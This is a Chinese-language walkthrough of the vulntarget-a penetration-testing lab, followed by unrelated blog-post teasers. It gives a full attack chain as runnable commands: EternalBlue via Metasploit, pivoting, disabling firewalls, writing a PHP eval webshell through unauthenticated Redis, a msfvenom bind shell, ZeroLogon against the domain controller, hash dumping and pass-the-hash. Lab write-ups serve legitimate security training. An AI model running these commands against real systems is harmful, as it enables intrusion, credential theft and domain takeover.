vulntarget-a

在这里插入图片描述

实际部署之后的win7 ip: 192.168.127.128
具体攻击过程如下

win7

扫描服务

使用fscan扫描win 7中的服务以及漏洞

 ./fscan -h 192.168.127.128 

在这里插入图片描述

扫出来一个ms17-010以及通达oa的漏洞,既然有永恒之蓝的,直接上MSF就行了

msf6 > search ms17-010
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.127.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.127.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 32463
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

成功拿到meterpreter

在这里插入图片描述

查看当前主机的网段信息

这里假装不知道当前主机的网段信息

meterpreter > shell
C:\Windows\system32>ipconfig /all
ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : win7-PCPrimary Dns Suffix  . . . . . . . : Node Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : localdomainEthernet adapter Bluetooth θçl½ѺMedia State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix  . : Description . . . . . . . . . . . : Bluetooth ʨ±¸(¸󉌇𳎸)Physical Address. . . . . . . . . : 3C-58-C2-68-2A-6CDHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesEthernet adapter ±¾µف¬½Ѡ2:Connection-specific DNS Suffix  . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2Physical Address. . . . . . . . . : 00-0C-29-D7-3A-42DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::acaf:ab76:dfe8:2c06%13(Preferred) IPv4 Address. . . . . . . . . . . : 10.0.20.98(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : 301993001DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-22-BE-AC-00-0C-29-B3-DB-08DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1fec0:0:0:ffff::2%1fec0:0:0:ffff::3%1NetBIOS over Tcpip. . . . . . . . : EnabledEthernet adapter ±¾µف¬½ѺConnection-specific DNS Suffix  . : localdomainDescription . . . . . . . . . . . : Intel(R) PRO/1000 MT Network ConnectionPhysical Address. . . . . . . . . : 00-0C-29-D7-3A-38DHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::4501:76e7:5c8e:86a1%11(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.127.128(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0Lease Obtained. . . . . . . . . . : 2024Ū7Ղ12ɕ 8:09:34Lease Expires . . . . . . . . . . : 2024Ū7Ղ12ɕ 14:54:26Default Gateway . . . . . . . . . : DHCP Server . . . . . . . . . . . : 192.168.127.254DHCPv6 IAID . . . . . . . . . . . : 234884137DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-22-BE-AC-00-0C-29-B3-DB-08DNS Servers . . . . . . . . . . . : 192.168.127.1NetBIOS over Tcpip. . . . . . . . : Enabled

可以看出来当前主机并没有处于域环境,而且存在192.168.127.1/2410.0.20.1/24两个网段

横向移动拿下win2016

设置路由

run post/multi/manage/autoroute    #自动添加路由
run autoroute -p    #打印查看的路由

可见10.0.20.1/24网段已经被添加进去了
在这里插入图片描述

扫描内网主机

扫描内网主机的方式有很多种,也可以直接使用MSF进行扫描,也可以上传一个fscan进行扫描,也可以直接搭建一个socks代理服务进行扫描

扫描存活

这里使用arp扫描

use post/windows/gather/arp_scanner
set rhosts 10.0.20.1-254
set session 1
run

扫描结果
在这里插入图片描述

10.0.20.99是未知的内网主机,接下来就对其进横向移动

先搭建一个socks5代理,然后通过nmap进行扫描10.0.20.99目标开放的服务

socks5代理搭建
background
use auxiliary/server/socks_proxy   #搭建代理服务,默认端口1080
run

搭建完之后,使用proxychains4 结合扫描工具进行扫描,proxychains4需要在/etc/proxychains4.conf文件修改代理配置,这里不在赘述。

nmap扫描目标主机开放服务

挂上代理,扫描特别慢,这里就扫描部分端口

proxychains nmap -Pn -sT  10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080

扫描结果

Host is up (12s latency).PORT     STATE  SERVICE
22/tcp   closed ssh
23/tcp   closed telnet
80/tcp   open   http
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
1433/tcp closed ms-sql-s
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
6379/tcp open   redis
8080/tcp closed http-proxy

可见目标主机开启了80,6379端口

扫描10.0.20.99目标主机80端口目录

在使用msf中的socks代理结合dirsearch目录扫描工具时,老是把代理扫崩,所以直接使用windows自带的netsh端口转发,将wind7系统的5631端口转发给内网主机win201680端口上面,这样就可以不使用代理来访问内网主机中的web服务了。

使用Netsh端口转发

在win7的shell中执行这个命令即可

#关闭win7防火墙
netsh firewall set opmode mode = disable#进行端口转发
netsh interface portproxy add v4tov4 listenport=5631 connectaddress=10.0.20.99 connectport=80

此时访问win7的5631端口就能访问到win2016主机的80端口了

由于给win7主机切换了一下网卡,导致其出网网卡的IP变为192.168.129.130

使用dirsearch进行目录扫描

python3 dirsearch.py -u http://192.168.127.130:5631/ 

扫描结果
在这里插入图片描述

l.php是一个探针
在这里插入图片描述

phpinfo也没啥好说的,由此看来80端口应该是没什么打的了,那试试6379端口

redis未授权写入webshell

redis最经典的漏洞莫非未授权了,先试试未授权

proxychains redis-cli -h 10.0.20.99

发现可以直接连上,那就是未授权了,直接打就完了,在phpinfo和探针里面都可以获取到web网站的路径,路径已知,那就写个🐎上去。

config set dir "C:/phpStudy/PHPTutorial/www/"
config set dbfilename a.php
set x "<?php @eval($_POST['cmd']);?>"
save

在这里插入图片描述

webshell写入成功,尝试蚁剑连接
在这里插入图片描述

连接成功,此时win2016这台主机就已经拿下了。

在win2016主机中查看当前网络信息,可以看到主DNS后缀,说明其是域内主机,并且发现了一个未知的IP段10.0.10.1/24
在这里插入图片描述

MSF上线win2016

我的思路是先使用msf上线win2016, 然后再进行横向移动到域控
msf生成正向的shell木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=7411 -f exe -o 7411.exe

将生成的木马通过蚁剑上传到win2016中
然后蚁剑中将win2016的防火墙关闭,要不然正向shell连不进去

netsh firewall set opmode mode = disable

打开MSF

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
set lport 7411
run

然后在蚁剑中运行木马
成功拿到了win2016的meterpreter
然后在进行一个进程迁移,省的一会再掉线了

run post/windows/manage/migrate

通过arp缓存查看内网主机

arp -a

在这里插入图片描述

刚刚我们看到的10.0.10.1/24网段只有一个10.0.10.110主机,那这个ip也大概就是域控,或者直接通过MSF查看

run post/windows/gather/enum_domain

在这里插入图片描述

域控

扫描域控

通过蚁剑在win2016中上上传一个fscan,扫一下域控,看看开放了什么端口,有没有部署其他的服务。
在这里插入图片描述

开放了一些端口,没扫出来什么漏洞。

为域控添加路由

在win2016的meterpreter中执行

run post/multi/manage/autoroute  

设置win2016为代理服务器

use auxiliary/server/socks_proxy
run

在下一步怎么进展这卡了半天,最后还是看官方文档的步骤才搞出来的
使用 # ZeroLogon (CVE-2020-1472)
POC: https://github.com/dirkjanm/CVE-2020-1472
按照传闻,运行这个脚本会将域控密码置空,说实在的,有点离谱😲

proxychains python cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述

dump域控的hash,这里使用kali自带的impacket-secretsdump工具

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述

拿到hash之后,再使用WMIC进行登入到域控

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./administrator@10.0.10.110

拿下域控☠️

在这里插入图片描述

总结

说一下思路,先使用永恒之蓝漏洞打win7,然后在将win2016的web端口给转发出来,通过扫描目录看到phpinfo文件,得到网站目录,然后再通过redis未授权漏洞写入shell,拿下win2016,域控是用CVE-2020-1472打的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/51239.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Bouncy Castle集成SM2与SM3

在Bouncy Castle库中&#xff0c;SM2和SM3是两种分别用于非对称加密和数字签名的密码算法&#xff0c;它们也可以结合使用&#xff0c;形成一种高安全性的加密签名方案&#xff0c;即SM2withSM3。以下是对SM2SM3的详细解释&#xff1a; 一、SM2算法 SM2是一种由中国国家密码管…

学前教育优化算法,原理详解,MATLAB代码免费获取

学前教育优化算法&#xff08;Preschool Education Optimization Algorithm&#xff0c;PEOA)是一种受学前教育过程中孩童的活动行为启发而提出的元启发式优化算法。学前教育在儿童的早期发展中起着至关重要的作用&#xff0c;并为他们未来的学习旅程奠定基础。作为幼儿学习者发…

【JavaScript】详解Day.js:轻量级日期处理库的全面指南

文章目录 一、Day.js简介1. 什么是Day.js&#xff1f;2. 安装Day.js 二、Day.js的基本用法1. 创建日期对象2. 格式化日期3. 解析日期字符串4. 操作日期5. 比较日期 三、Day.js的高级功能1. 插件机制2. 国际化支持 四、实际应用案例1. 事件倒计时2. 日历应用 在JavaScript开发中…

Python | ValueError: could not convert string to float: ‘example’

Python | ValueError: could not convert string to float: ‘example’ 在Python编程中&#xff0c;类型转换是一个常见的操作。然而&#xff0c;当尝试将一个字符串转换为浮点数时&#xff0c;如果字符串的内容不是有效的浮点数表示&#xff0c;就会遇到“ValueError: could…

labview四字节转浮点数

1.labview四字节转浮点数 2.Labview怎么把串口接收到的数据转换成浮点数&#xff1f; Labview怎么把串口接收到的数据转换成浮点数&#xff1f;

如何跨越 LangChain 应用研发的最后一公里

说 [LangChain] 是现在最流行的 AI 应用开发框架&#xff0c;应该没有人出来反对吧。LangChain 的出现极大地简化了基于大型语言模型&#xff08;LLM&#xff09;的 AI 应用构建难度&#xff0c;如果把 AI 应用比作一个人的话&#xff0c;那么 LLM 相当于这个人的“大脑”&…

基于vue-grid-layout插件(vue版本)实现增删改查/拖拽自动排序等功能(已验证、可正常运行)

前端时间有个需求&#xff0c;需要对33&#xff08;不一定&#xff0c;也可能多行&#xff09;的卡片布局&#xff0c;进行拖拽&#xff0c;拖拽过程中自动排序&#xff0c;以下代码是基于vue2&#xff0c;可直接运行&#xff0c;报错可评论滴我 部分代码优化来自于GPT4o和Clau…

78.WEB渗透测试-信息收集-框架组件识别利用(2)

免责声明&#xff1a;内容仅供学习参考&#xff0c;请合法利用知识&#xff0c;禁止进行违法犯罪活动&#xff01; 内容参考于&#xff1a; 易锦网校会员专享课 上一个内容&#xff1a;77.WEB渗透测试-信息收集-框架组件识别利用&#xff08;1&#xff09; shiro&#xff1a;…

支持向量机 及其分类案例详解(附Python 代码)

支持向量机分类器预测收入等级 我们将构建一个支持向量机&#xff08;SVM&#xff09;分类器&#xff0c;以预测一个人基于14个属性的收入等级。我们的目标是判断收入是否高于或低于每年$50,000。因此&#xff0c;这是一个二元分类问题。我们将使用在此处可用的人口普查收入数…

JDBC基础

目录 一、JDBC概述 二、JDBC搭建 1.注册JDBC驱动程序 2.建立与数据库连接 3.获得Satement执行sql语句 4.关闭与数据库的链接通道 三、PreparedStatement和Statement 1、代码的可读性和可维护性 2、最重要的一点是极大地提高了安全性 四、结果集处理 一、JDBC概述 JD…

c语言指针2

文章目录 一、void * 指针二、const关键字1.const修饰变量2.const修饰指针变量2. 1 const放在*的右边2. 2 const放在*的左边2. 3 总结 三、指针的运算3. 1指针的加减运算3. 2 指针 - 指针3. 3 指针的关系运算 四、野指针4. 1 什么叫野指针&#xff1f;4. 1 野指针的成因4.1.1 指…

Poetry入门教程

以前使用模块管理和虚拟环境为pip和Virtualenv组合&#xff0c;随着Rasa、Dify等开源项目逐步使用Poetry模块管理&#xff0c;也开始尝试使用Poetry。本文简要介绍Poetry入门操作。 1.Poetry安装 可参考Poetry官网[1]推荐的安装方式&#xff1a; 通过Windows的Powershell如下…

C++编程: 使用 Nanomsg 进行 PUB-SUB 模式基准测试

文章目录 0. 引言1. Nanomsg简介1.1 可扩展性协议类型1.2 支持的传输机制1.3 NanoMsg 架构与实现 2. PUB-SUB 模式基准测试 0. 引言 Nanomsg 作为一款高性能的通信库&#xff0c;支持多种消息传递模式&#xff0c;其中包括 PUB-SUB&#xff08;发布-订阅&#xff09;。 本篇文…

yolov8环境安装

一、Miniconda Conda 是一个开源的包管理和环境管理系统&#xff0c;它能运行、安装和更新各种包和依赖&#xff0c;同时还能创建隔离的环境。 1.1 下载安装 Miniconda https://repo.anaconda.com/miniconda/Miniconda3-py39_24.5.0-0-Windows-x86_64.exe1.2 打开 Anaconda …

向量数据库(一)

写在前面 最近在学习一些 AI 相关的开发&#xff0c;了解了一些未接触过的东西&#xff0c;其中有一部分是向量数据库&#xff0c;想开一个专题&#xff0c;对相关的内容做一下整理。 内容 什么是向量数据库 一般在我们的日常开发中&#xff0c;使用的数据库存储主要有两种…

Matlab进阶绘图第65期—带分组折线段的柱状图

带分组折线段的柱状图是在原始柱状图的基础上&#xff0c;在每组柱状图位置处分别添加折线段&#xff0c;以进行对比或添加额外信息。 由于Matlab中未收录带分组折线段的柱状图的绘制函数&#xff0c;因此需要大家自行设法解决。 本文使用自制的BarwithGroupedLine小工具进行…

大模型算法面试题(十四)

本系列收纳各种大模型面试题及答案。 1、微调后的模型出现能力劣化&#xff0c;灾难性遗忘是怎么回事 微调后的模型出现能力劣化&#xff0c;灾难性遗忘&#xff08;Catastrophic Forgetting&#xff09;是一个在机器学习领域&#xff0c;尤其是在深度学习和大模型应用中频繁出…

数据库(MySQL)-DQL数据查询语言

DQL(Data Query Language 数据查询语言)的用途是查询数据库数据&#xff0c;如select语句。其中&#xff0c;可以根据表的结构和关系分为单表查询和多表联查。 单表查询 单表查询&#xff1a;针对数据库中的一张数据表进行查询 全字段查询 语法&#xff1a;select 字段名 fro…

报警系统与机房动力环境监控系统的集成及报警功能实施

在当今的运维行业中&#xff0c;确保关键基础设施的安全与稳定运行面临着诸多挑战&#xff0c;如设备故障、环境异常、非法入侵等。为了有效应对这些挑战&#xff0c;报警系统与机房动力环境监控系统的集成变得至关重要。本文旨在为运维团队提供关于报警系统与机房动力环境监控…

使用frrouting、gns3、pim实现ipv6组播(三)

翻遍整个网络都没有找到用ipv6进行组播推流的实例。 朋友说&#xff1a;A true strong person never complains about the environment 那么&#xff0c;就由我来创造一个吧~ 此文涉及到的所有软件均为开源软件&#xff0c;进行深入学习与其他平台移植时十分便利。 记得点赞额…